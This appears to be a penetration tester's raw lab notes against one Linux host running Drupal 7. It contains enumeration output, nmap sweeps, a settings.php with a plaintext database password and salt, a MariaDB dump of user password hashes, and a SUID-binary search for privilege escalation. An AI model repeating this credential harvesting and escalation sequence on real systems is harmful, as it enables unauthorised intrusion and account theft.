S-1-5-21-2533145648-3863246947-1352230376-1034 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1035 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1036 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1037 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1038 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1039 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1040 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1041 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1042 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1043 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1044 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1045 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1046 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1047 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1048 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1049 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\ubuntu (Local User)
S-1-22-1-1001 Unix User\auditor (Local User)
S-1-22-1-1002 Unix User\dbadmin (Local User)

 =============================================== 
|    Getting printer info for 192.168.100.52    |
 =============================================== 
No printers returned.


enum4linux complete on Wed Feb 11 01:02:38 2026

--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------

msf6 > hosts

Hosts
=====

address         mac                name                                  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----                                  -------  ---------  -----  -------  ----  --------
192.168.100.52  02:92:77:8a:57:73  ip-192-168-100-52.ap-south-1.compute  Linux               3.X    server
                                   .internal

msf6 > services
Services
========

host            port  proto  name           state  info
----            ----  -----  ----           -----  ----
192.168.100.52  21    tcp    ftp            open   vsftpd 3.0.3
192.168.100.52  22    tcp    ssh            open   OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
192.168.100.52  25    tcp    smtp           open   OpenSMTPD
192.168.100.52  80    tcp    http           open   Apache httpd 2.4.41
192.168.100.52  139   tcp    netbios-ssn    open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.100.52  445   tcp    netbios-ssn    open   Samba smbd 4.13.17-Ubuntu workgroup: WORKGROUP
192.168.100.52  3306  tcp    mysql          open   MySQL 5.5.5-10.3.34-MariaDB-0ubuntu0.20.04.1
192.168.100.52  3389  tcp    ms-wbt-server  open   xrdp


--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------

simply ping it
nmap -sn 192.168.1.0/24
nmap -sn 192.168.2.0/24
nmap -sn 192.168.200.0/24
nmap -sn 192.168.0.0/24

--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------


<?php

/**
 * @file
 * Drupal site-specific configuration file.
 *
 * IMPORTANT NOTE:
 * This file may have been set to read-only by the Drupal installation program.
 * If you make changes to this file, be sure to protect it again after making
 * your modifications. Failure to remove write permissions to this file is a
 * security risk.
 *
 * The configuration file to be loaded is based upon the rules below. However
 * if the multisite aliasing file named sites/sites.php is present, it will be
 * loaded, and the aliases in the array $sites will override the default
 * directory rules below. See sites/example.sites.php for more information about
 * aliases.
 *
 * The configuration directory will be discovered by stripping the website's
 * hostname from left to right and pathname from right to left. The first
 * configuration file found will be used and any others will be ignored. If no
 * other configuration file is found then the default configuration file at
 * 'sites/default' will be used.
 *
 * For example, for a fictitious site installed at
 * http://www.drupal.org:8080/mysite/test/, the 'settings.php' file is searched
 * for in the following directories:
 *
 * - sites/8080.www.drupal.org.mysite.test
 * - sites/www.drupal.org.mysite.test
 * - sites/drupal.org.mysite.test
 * - sites/org.mysite.test
 *
 * - sites/8080.www.drupal.org.mysite
 * - sites/www.drupal.org.mysite
 * - sites/drupal.org.mysite
 * - sites/org.mysite
 *
 * - sites/8080.www.drupal.org
 * - sites/www.drupal.org
 * - sites/drupal.org
 * - sites/org
 *
 * - sites/default
 *
 * Note that if you are installing on a non-standard port number, prefix the
 * hostname with that number. For example,
 * http://www.drupal.org:8080/mysite/test/ could be loaded from
 * sites/8080.www.drupal.org.mysite.test/.
 *
 * @see example.sites.php
 * @see conf_path()
 */

/**
 * Database settings:
 *
 * The $databases array specifies the database connection or
 * connections that Drupal may use.  Drupal is able to connect
 * to multiple databases, including multiple types of databases,
 * during the same request.
 *
 * Each database connection is specified as an array of settings,
 * similar to the following:
 * @code
 * array(
 *   'driver' => 'mysql',
 *   'database' => 'databasename',
 *   'username' => 'username',
 *   'password' => 'password',
 *   'host' => 'localhost',
 *   'port' => 3306,
 *   'prefix' => 'myprefix_',
 *   'collation' => 'utf8_general_ci',
 * );
 * @endcode
 *
 * The "driver" property indicates what Drupal database driver the
 * connection should use.  This is usually the same as the name of the
 * database type, such as mysql or sqlite, but not always.  The other
 * properties will vary depending on the driver.  For SQLite, you must
 * specify a database file name in a directory that is writable by the
 * webserver.  For most other drivers, you must specify a
 * username, password, host, and database name.
 *
 * Transaction support is enabled by default for all drivers that support it,
 * including MySQL. To explicitly disable it, set the 'transactions' key to
 * FALSE.
 * Note that some configurations of MySQL, such as the MyISAM engine, don't
 * support it and will proceed silently even if enabled. If you experience
 * transaction related crashes with such configuration, set the 'transactions'
 * key to FALSE.
 *
 * For each database, you may optionally specify multiple "target" databases.
 * A target database allows Drupal to try to send certain queries to a
 * different database if it can but fall back to the default connection if not.
 * That is useful for master/slave replication, as Drupal may try to connect
 * to a slave server when appropriate and if one is not available will simply
 * fall back to the single master server.
 *
 * The general format for the $databases array is as follows:
 * @code
 * $databases['default']['default'] = $info_array;
 * $databases['default']['slave'][] = $info_array;
 * $databases['default']['slave'][] = $info_array;
 * $databases['extra']['default'] = $info_array;
 * @endcode
 *
 * In the above example, $info_array is an array of settings described above.
 * The first line sets a "default" database that has one master database
 * (the second level default).  The second and third lines create an array
 * of potential slave databases.  Drupal will select one at random for a given
 * request as needed.  The fourth line creates a new database with a name of
 * "extra".
 *
 * For a single database configuration, the following is sufficient:
 * @code
 * $databases['default']['default'] = array(
 *   'driver' => 'mysql',
 *   'database' => 'databasename',
 *   'username' => 'username',
 *   'password' => 'password',
 *   'host' => 'localhost',
 *   'prefix' => 'main_',
 *   'collation' => 'utf8_general_ci',
 * );
 * @endcode
 *
 * For handling full UTF-8 in MySQL, including multi-byte characters such as
 * emojis, Asian symbols, and mathematical symbols, you may set the collation
 * and charset to "utf8mb4" prior to running install.php:
 * @code
 * $databases['default']['default'] = array(
 *   'driver' => 'mysql',
 *   'database' => 'databasename',
 *   'username' => 'username',
 *   'password' => 'password',
 *   'host' => 'localhost',
 *   'charset' => 'utf8mb4',
 *   'collation' => 'utf8mb4_general_ci',
 * );
 * @endcode
 * When using this setting on an existing installation, ensure that all existing
 * tables have been converted to the utf8mb4 charset, for example by using the
 * utf8mb4_convert contributed project available at
 * https://www.drupal.org/project/utf8mb4_convert, so as to prevent mixing data
 * with different charsets.
 * Note this should only be used when all of the following conditions are met:
 * - In order to allow for large indexes, MySQL must be set up with the
 *   following my.cnf settings:
 *     [mysqld]
 *     innodb_large_prefix=true
 *     innodb_file_format=barracuda
 *     innodb_file_per_table=true
 *   These settings are available as of MySQL 5.5.14, and are defaults in
 *   MySQL 5.7.7 and up.
 * - The PHP MySQL driver must support the utf8mb4 charset (libmysqlclient
 *   5.5.3 and up, as well as mysqlnd 5.0.9 and up).
 * - The MySQL server must support the utf8mb4 charset (5.5.3 and up).
 *
 * You can optionally set prefixes for some or all database table names
 * by using the 'prefix' setting. If a prefix is specified, the table
 * name will be prepended with its value. Be sure to use valid database
 * characters only, usually alphanumeric and underscore. If no prefixes
 * are desired, leave it as an empty string ''.
 *
 * To have all database names prefixed, set 'prefix' as a string:
 * @code
 *   'prefix' => 'main_',
 * @endcode
 * To provide prefixes for specific tables, set 'prefix' as an array.
 * The array's keys are the table names and the values are the prefixes.
 * The 'default' element is mandatory and holds the prefix for any tables
 * not specified elsewhere in the array. Example:
 * @code
 *   'prefix' => array(
 *     'default'   => 'main_',
 *     'users'     => 'shared_',
 *     'sessions'  => 'shared_',
 *     'role'      => 'shared_',
 *     'authmap'   => 'shared_',
 *   ),
 * @endcode
 * You can also use a reference to a schema/database as a prefix. This may be
 * useful if your Drupal installation exists in a schema that is not the default
 * or you want to access several databases from the same code base at the same
 * time.
 * Example:
 * @code
 *   'prefix' => array(
 *     'default'   => 'main.',
 *     'users'     => 'shared.',
 *     'sessions'  => 'shared.',
 *     'role'      => 'shared.',
 *     'authmap'   => 'shared.',
 *   );
 * @endcode
 * NOTE: MySQL and SQLite's definition of a schema is a database.
 *
 * Advanced users can add or override initial commands to execute when
 * connecting to the database server, as well as PDO connection settings. For
 * example, to enable MySQL SELECT queries to exceed the max_join_size system
 * variable, and to reduce the database connection timeout to 5 seconds:
 *
 * @code
 * $databases['default']['default'] = array(
 *   'init_commands' => array(
 *     'big_selects' => 'SET SQL_BIG_SELECTS=1',
 *   ),
 *   'pdo' => array(
 *     PDO::ATTR_TIMEOUT => 5,
 *   ),
 * );
 * @endcode
 *
 * WARNING: These defaults are designed for database portability. Changing them
 * may cause unexpected behavior, including potential data loss.
 *
 * @see DatabaseConnection_mysql::__construct
 * @see DatabaseConnection_pgsql::__construct
 * @see DatabaseConnection_sqlite::__construct
 *
 * Database configuration format:
 * @code
 *   $databases['default']['default'] = array(
 *     'driver' => 'mysql',
 *     'database' => 'databasename',
 *     'username' => 'username',
 *     'password' => 'password',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *   );
 *   $databases['default']['default'] = array(
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'username',
 *     'password' => 'password',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *   );
 *   $databases['default']['default'] = array(
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *   );
 * @endcode
 */
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'syntex0421',
      'host' => 'localhost',
      'port' => '3306',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

/**
 * Access control for update.php script.
 *
 * If you are updating your Drupal installation using the update.php script but
 * are not logged in using either an account with the "Administer software
 * updates" permission or the site maintenance account (the account that was
 * created during installation), you will need to modify the access check
 * statement below. Change the FALSE to a TRUE to disable the access check.
 * After finishing the upgrade, be sure to open this file again and change the
 * TRUE back to a FALSE!
 */
$update_free_access = FALSE;

/**
 * Salt for one-time login links and cancel links, form tokens, etc.
 *
 * This variable will be set to a random value by the installer. All one-time
 * login links will be invalidated if the value is changed. Note that if your
 * site is deployed on a cluster of web servers, you must ensure that this
 * variable has the same value on each server. If this variable is empty, a hash
 * of the serialized database credentials will be used as a fallback salt.
 *
 * For enhanced security, you may set this variable to a value using the
 * contents of a file outside your docroot that is never saved together
 * with any backups of your Drupal files and database.
 *
 * Example:
 *   $drupal_hash_salt = file_get_contents('/home/example/salt.txt');
 *
 */
$drupal_hash_salt = 'e-5a2o6PCMfkMD1w-sV496_xJRE8sKku2o3CKeyTM9c';

/**
 * Base URL (optional).
 *
 * If Drupal is generating incorrect URLs on your site, which could
 * be in HTML headers (links to CSS and JS files) or visible links on pages
 * (such as in menus), uncomment the Base URL statement below (remove the
 * leading hash sign) and fill in the absolute URL to your Drupal installation.
 *
 * You might also want to force users to use a given domain.
 * See the .htaccess file for more information.
 *
 * Examples:
 *   $base_url = 'http://www.example.com';
 *   $base_url = 'http://www.example.com:8888';
 *   $base_url = 'http://www.example.com/drupal';
 *   $base_url = 'https://www.example.com:8888/drupal';
 *
 * It is not allowed to have a trailing slash; Drupal will add it
 * for you.
 */
# $base_url = 'http://www.example.com';  // NO trailing slash!

/**
 * PHP settings:
 *
 * To see what PHP settings are possible, including whether they can be set at
 * runtime (by using ini_set()), read the PHP documentation:
 * http://www.php.net/manual/ini.list.php
 * See drupal_environment_initialize() in includes/bootstrap.inc for required
 * runtime settings and the .htaccess file for non-runtime settings. Settings
 * defined there should not be duplicated here so as to avoid conflict issues.
 */

/**
 * Some distributions of Linux (most notably Debian) ship their PHP
 * installations with garbage collection (gc) disabled. Since Drupal depends on
 * PHP's garbage collection for clearing sessions, ensure that garbage
 * collection occurs by using the most common settings.
 */
ini_set('session.gc_probability', 1);
ini_set('session.gc_divisor', 100);

/**
 * Set session lifetime (in seconds), i.e. the time from the user's last visit
 * to the active session may be deleted by the session garbage collector. When
 * a session is deleted, authenticated users are logged out, and the contents
 * of the user's $_SESSION variable is discarded.
 */
ini_set('session.gc_maxlifetime', 200000);

/**
 * Set session cookie lifetime (in seconds), i.e. the time from the session is
 * created to the cookie expires, i.e. when the browser is expected to discard
 * the cookie. The value 0 means "until the browser is closed".
 */
ini_set('session.cookie_lifetime', 2000000);

/**
 * If you encounter a situation where users post a large amount of text, and
 * the result is stripped out upon viewing but can still be edited, Drupal's
 * output filter may not have sufficient memory to process it.  If you
 * experience this issue, you may wish to uncomment the following two lines
 * and increase the limits of these variables.  For more information, see
 * http://php.net/manual/pcre.configuration.php.
 */
# ini_set('pcre.backtrack_limit', 200000);
# ini_set('pcre.recursion_limit', 200000);

/**
 * Drupal automatically generates a unique session cookie name for each site
 * based on its full domain name. If you have multiple domains pointing at the
 * same Drupal site, you can either redirect them all to a single domain (see
 * comment in .htaccess), or uncomment the line below and specify their shared
 * base domain. Doing so assures that users remain logged in as they cross
 * between your various domains. Make sure to always start the $cookie_domain
 * with a leading dot, as per RFC 2109.
 */
# $cookie_domain = '.example.com';

/**
 * Variable overrides:
 *
 * To override specific entries in the 'variable' table for this site,
 * set them here. You usually don't need to use this feature. This is
 * useful in a configuration file for a vhost or directory, rather than
 * the default settings.php. Any configuration setting from the 'variable'
 * table can be given a new value. Note that any values you provide in
 * these variable overrides will not be modifiable from the Drupal
 * administration interface.
 *
 * The following overrides are examples:
 * - site_name: Defines the site's name.
 * - theme_default: Defines the default theme for this site.
 * - anonymous: Defines the human-readable name of anonymous users.
 * Remove the leading hash signs to enable.
 */
# $conf['site_name'] = 'My Drupal site';
# $conf['theme_default'] = 'garland';
# $conf['anonymous'] = 'Visitor';

/**
 * A custom theme can be set for the offline page. This applies when the site
 * is explicitly set to maintenance mode through the administration page or when
 * the database is inactive due to an error. It can be set through the
 * 'maintenance_theme' key. The template file should also be copied into the
 * theme. It is located inside 'modules/system/maintenance-page.tpl.php'.
 * Note: This setting does not apply to installation and update pages.
 */
# $conf['maintenance_theme'] = 'bartik';

/**
 * Reverse Proxy Configuration:
 *
 * Reverse proxy servers are often used to enhance the performance
 * of heavily visited sites and may also provide other site caching,
 * security, or encryption benefits. In an environment where Drupal
 * is behind a reverse proxy, the real IP address of the client should
 * be determined such that the correct client IP address is available
 * to Drupal's logging, statistics, and access management systems. In
 * the most simple scenario, the proxy server will add an
 * X-Forwarded-For header to the request that contains the client IP
 * address. However, HTTP headers are vulnerable to spoofing, where a
 * malicious client could bypass restrictions by setting the
 * X-Forwarded-For header directly. Therefore, Drupal's proxy
 * configuration requires the IP addresses of all remote proxies to be
 * specified in $conf['reverse_proxy_addresses'] to work correctly.
 *
 * Enable this setting to get Drupal to determine the client IP from
 * the X-Forwarded-For header (or $conf['reverse_proxy_header'] if set).
 * If you are unsure about this setting, do not have a reverse proxy,
 * or Drupal operates in a shared hosting environment, this setting
 * should remain commented out.
 *
 * In order for this setting to be used you must specify every possible
 * reverse proxy IP address in $conf['reverse_proxy_addresses'].
 * If a complete list of reverse proxies is not available in your
 * environment (for example, if you use a CDN) you may set the
 * $_SERVER['REMOTE_ADDR'] variable directly in settings.php.
 * Be aware, however, that it is likely that this would allow IP
 * address spoofing unless more advanced precautions are taken.
 */
# $conf['reverse_proxy'] = TRUE;

/**
 * Specify every reverse proxy IP address in your environment.
 * This setting is required if $conf['reverse_proxy'] is TRUE.
 */
# $conf['reverse_proxy_addresses'] = array('a.b.c.d', ...);

/**
 * Set this value if your proxy server sends the client IP in a header
 * other than X-Forwarded-For.
 */
# $conf['reverse_proxy_header'] = 'HTTP_X_CLUSTER_CLIENT_IP';

/**
 * Page caching:
 *
 * By default, Drupal sends a "Vary: Cookie" HTTP header for anonymous page
 * views. This tells a HTTP proxy that it may return a page from its local
 * cache without contacting the web server, if the user sends the same Cookie
 * header as the user who originally requested the cached page. Without "Vary:
 * Cookie", authenticated users would also be served the anonymous page from
 * the cache. If the site has mostly anonymous users except a few known
 * editors/administrators, the Vary header can be omitted. This allows for
 * better caching in HTTP proxies (including reverse proxies), i.e. even if
 * clients send different cookies, they still get content served from the cache.
 * However, authenticated users should access the site directly (i.e. not use an
 * HTTP proxy, and bypass the reverse proxy if one is used) in order to avoid
 * getting cached pages from the proxy.
 */
# $conf['omit_vary_cookie'] = TRUE;

/**
 * CSS/JS aggregated file gzip compression:
 *
 * By default, when CSS or JS aggregation and clean URLs are enabled Drupal will
 * store a gzip compressed (.gz) copy of the aggregated files. If this file is
 * available then rewrite rules in the default .htaccess file will serve these
 * files to browsers that accept gzip encoded content. This allows pages to load
 * faster for these users and has minimal impact on server load. If you are
 * using a webserver other than Apache httpd, or a caching reverse proxy that is
 * configured to cache and compress these files itself you may want to uncomment
 * one or both of the below lines, which will prevent gzip files being stored.
 */
# $conf['css_gzip_compression'] = FALSE;
# $conf['js_gzip_compression'] = FALSE;

/**
 * Block caching:
 *
 * Block caching may not be compatible with node access modules depending on
 * how the original block cache policy is defined by the module that provides
 * the block. By default, Drupal therefore disables block caching when one or
 * more modules implement hook_node_grants(). If you consider block caching to
 * be safe on your site and want to bypass this restriction, uncomment the line
 * below.
 */
# $conf['block_cache_bypass_node_grants'] = TRUE;

/**
 * String overrides:
 *
 * To override specific strings on your site with or without enabling the Locale
 * module, add an entry to this list. This functionality allows you to change
 * a small number of your site's default English language interface strings.
 *
 * Remove the leading hash signs to enable.
 */
# $conf['locale_custom_strings_en'][''] = array(
#   'forum'      => 'Discussion board',
#   '@count min' => '@count minutes',
# );

/**
 *
 * IP blocking:
 *
 * To bypass database queries for denied IP addresses, use this setting.
 * Drupal queries the {blocked_ips} table by default on every page request
 * for both authenticated and anonymous users. This allows the system to
 * block IP addresses from within the administrative interface and before any
 * modules are loaded. However on high traffic websites you may want to avoid
 * this query, allowing you to bypass database access altogether for anonymous
 * users under certain caching configurations.
 *
 * If using this setting, you will need to add back any IP addresses which
 * you may have blocked via the administrative interface. Each element of this
 * array represents a blocked IP address. Uncommenting the array and leaving it
 * empty will have the effect of disabling IP blocking on your site.
 *
 * Remove the leading hash signs to enable.
 */
# $conf['blocked_ips'] = array(
#   'a.b.c.d',
# );

/**
 * Fast 404 pages:
 *
 * Drupal can generate fully themed 404 pages. However, some of these responses
 * are for images or other resource files that are not displayed to the user.
 * This can waste bandwidth, and also generate server load.
 *
 * The options below return a simple, fast 404 page for URLs matching a
 * specific pattern:
 * - 404_fast_paths_exclude: A regular expression to match paths to exclude,
 *   such as images generated by image styles, or dynamically-resized images.
 *   The default pattern provided below also excludes the private file system.
 *   If you need to add more paths, you can add '|path' to the expression.
 * - 404_fast_paths: A regular expression to match paths that should return a
 *   simple 404 page, rather than the fully themed 404 page. If you don't have
 *   any aliases ending in htm or html you can add '|s?html?' to the expression.
 * - 404_fast_html: The html to return for simple 404 pages.
 *
 * Add leading hash signs if you would like to disable this functionality.
 */
$conf['404_fast_paths_exclude'] = '/\/(?:styles)|(?:system\/files)\//';
$conf['404_fast_paths'] = '/\.(?:txt|png|gif|jpe?g|css|js|ico|swf|flv|cgi|bat|pl|dll|exe|asp)$/i';
$conf['404_fast_html'] = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "@path" was not found on this server.</p></body></html>';

/**
 * By default the page request process will return a fast 404 page for missing
 * files if they match the regular expression set in '404_fast_paths' and not
 * '404_fast_paths_exclude' above. 404 errors will simultaneously be logged in
 * the Drupal system log.
 *
 * You can choose to return a fast 404 page earlier for missing pages (as soon
 * as settings.php is loaded) by uncommenting the line below. This speeds up
 * server response time when loading 404 error pages and prevents the 404 error
 * from being logged in the Drupal system log. In order to prevent valid pages
 * such as image styles and other generated content that may match the
 * '404_fast_paths' regular expression from returning 404 errors, it is
 * necessary to add them to the '404_fast_paths_exclude' regular expression
 * above. Make sure that you understand the effects of this feature before
 * uncommenting the line below.
 */
# drupal_fast_404();

/**
 * External access proxy settings:
 *
 * If your site must access the Internet via a web proxy then you can enter
 * the proxy settings here. Currently only basic authentication is supported
 * by using the username and password variables. The proxy_user_agent variable
 * can be set to NULL for proxies that require no User-Agent header or to a
 * non-empty string for proxies that limit requests to a specific agent. The
 * proxy_exceptions variable is an array of host names to be accessed directly,
 * not via proxy.
 */
# $conf['proxy_server'] = '';
# $conf['proxy_port'] = 8080;
# $conf['proxy_username'] = '';
# $conf['proxy_password'] = '';
# $conf['proxy_user_agent'] = '';
# $conf['proxy_exceptions'] = array('127.0.0.1', 'localhost');

/**
 * Authorized file system operations:
 *
 * The Update manager module included with Drupal provides a mechanism for
 * site administrators to securely install missing updates for the site
 * directly through the web user interface. On securely-configured servers,
 * the Update manager will require the administrator to provide SSH or FTP
 * credentials before allowing the installation to proceed; this allows the
 * site to update the new files as the user who owns all the Drupal files,
 * instead of as the user the webserver is running as. On servers where the
 * webserver user is itself the owner of the Drupal files, the administrator
 * will not be prompted for SSH or FTP credentials (note that these server
 * setups are common on shared hosting, but are inherently insecure).
 *
 * Some sites might wish to disable the above functionality, and only update
 * the code directly via SSH or FTP themselves. This setting completely
 * disables all functionality related to these authorized file operations.
 *
 * @see http://drupal.org/node/244924
 *
 * Remove the leading hash signs to disable.
 */
# $conf['allow_authorize_operations'] = FALSE;

/**
 * Theme debugging:
 *
 * When debugging is enabled:
 * - The markup of each template is surrounded by HTML comments that contain
 *   theming information, such as template file name suggestions.
 * - Note that this debugging markup will cause automated tests that directly
 *   check rendered HTML to fail.
 *
 * For more information about debugging theme templates, see
 * https://www.drupal.org/node/223440#theme-debug.
 *
 * Not recommended in production environments.
 *
 * Remove the leading hash sign to enable.
 */
# $conf['theme_debug'] = TRUE;

/**
 * CSS identifier double underscores allowance:
 *
 * To allow CSS identifiers to contain double underscores (.example__selector)
 * for Drupal's BEM-style naming standards, uncomment the line below.
 * Note that if you change this value in existing sites, existing page styles
 * may be broken.
 *
 * @see drupal_clean_css_identifier()
 */
# $conf['allow_css_double_underscores'] = TRUE;
dbadmin@ip-192-168-100-52:/var/www/html/drupal/sites/default$ 

--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------

MariaDB [drupal]> SELECT uid, name, mail, pass FROM users;
+-----+----------+----------------------+---------------------------------------------------------+
| uid | name     | mail                 | pass                                                    |
+-----+----------+----------------------+---------------------------------------------------------+
|   0 |          |                      |                                                         |
|   1 | admin    | admin@syntex.com     | $S$D67i0qFmSLMLwZ9PU7VEocSS9fvV1JaSeJxQMgCid80hGbq6wXZH |
|   2 | auditor  | auditor@syntex.com   | $S$DV.wsqkmKY3y5VW.icW/g5NTU3h.UA01nxqL9Cro27GaSBYpH4WC |
|   3 | dbadmin  | dbadmin@syntex.com   | $S$DZcGD5qcb6xso1E/Mu6DJP4uPi5DfY28kBEyuIab8Pod1saBaImN |
|   4 | Vincenzo | vincenzo@syntext.com | $S$DGnS.dK3q2FeWeNbLikdI5Hk/XdBFI2jBFkmPvv/v9Ln8vjIanIu |
+-----+----------+----------------------+---------------------------------------------------------+
5 rows in set (0.000 sec)

--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------

mysql -u drupal -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 261
Server version: 10.3.34-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
MariaDB [(none)]> show tables
    -> ;
ERROR 1046 (3D000): No database selected
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| drupal             |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.001 sec)

MariaDB [(none)]> USE drupal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [drupal]> SHOW TABLES;
+-----------------------------+
| Tables_in_drupal            |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| comment                     |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| watchdog                    |
+-----------------------------+
73 rows in set (0.001 sec)

MariaDB [drupal]> SELECT uid, name, mail, pass FROM users;
+-----+----------+----------------------+---------------------------------------------------------+
| uid | name     | mail                 | pass                                                    |
+-----+----------+----------------------+---------------------------------------------------------+
|   0 |          |                      |                                                         |
|   1 | admin    | admin@syntex.com     | $S$D67i0qFmSLMLwZ9PU7VEocSS9fvV1JaSeJxQMgCid80hGbq6wXZH |
|   2 | auditor  | auditor@syntex.com   | $S$DV.wsqkmKY3y5VW.icW/g5NTU3h.UA01nxqL9Cro27GaSBYpH4WC |
|   3 | dbadmin  | dbadmin@syntex.com   | $S$DZcGD5qcb6xso1E/Mu6DJP4uPi5DfY28kBEyuIab8Pod1saBaImN |
|   4 | Vincenzo | vincenzo@syntext.com | $S$DGnS.dK3q2FeWeNbLikdI5Hk/XdBFI2jBFkmPvv/v9Ln8vjIanIu |
+-----+----------+----------------------+---------------------------------------------------------+
5 rows in set (0.000 sec)

MariaDB [drupal]> SELECT * FROM system WHERE type='module' AND name='system';
+------------------------------+--------+--------+-------+--------+-----------+----------------+--------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| filename                     | name   | type   | owner | status | bootstrap | schema_version | weight | info                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   |
+------------------------------+--------+--------+-------+--------+-----------+----------------+--------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| modules/system/system.module | system | module |       |      1 |         0 |           7081 |      0 | a:14:{s:4:"name";s:6:"System";s:11:"description";s:54:"Handles general site configuration for administrators.";s:7:"package";s:4:"Core";s:7:"version";s:4:"7.57";s:4:"core";s:3:"7.x";s:5:"files";a:6:{i:0;s:19:"system.archiver.inc";i:1;s:15:"system.mail.inc";i:2;s:16:"system.queue.inc";i:3;s:14:"system.tar.inc";i:4;s:18:"system.updater.inc";i:5;s:11:"system.test";}s:8:"required";b:1;s:9:"configure";s:19:"admin/config/system";s:7:"project";s:6:"drupal";s:9:"datestamp";s:10:"1519235152";s:5:"mtime";i:1519235152;s:12:"dependencies";a:0:{}s:3:"php";s:5:"5.2.4";s:9:"bootstrap";i:0;} |
+------------------------------+--------+--------+-------+--------+-----------+----------------+--------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)

MariaDB [drupal]> 

--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------

dbadmin@ip-192-168-100-52:/$ find / -perm -4000 -type f 2>/dev/null
/snap/core22/2292/usr/bin/chfn
/snap/core22/2292/usr/bin/chsh
/snap/core22/2292/usr/bin/gpasswd
/snap/core22/2292/usr/bin/mount
/snap/core22/2292/usr/bin/newgrp
/snap/core22/2292/usr/bin/passwd
/snap/core22/2292/usr/bin/su
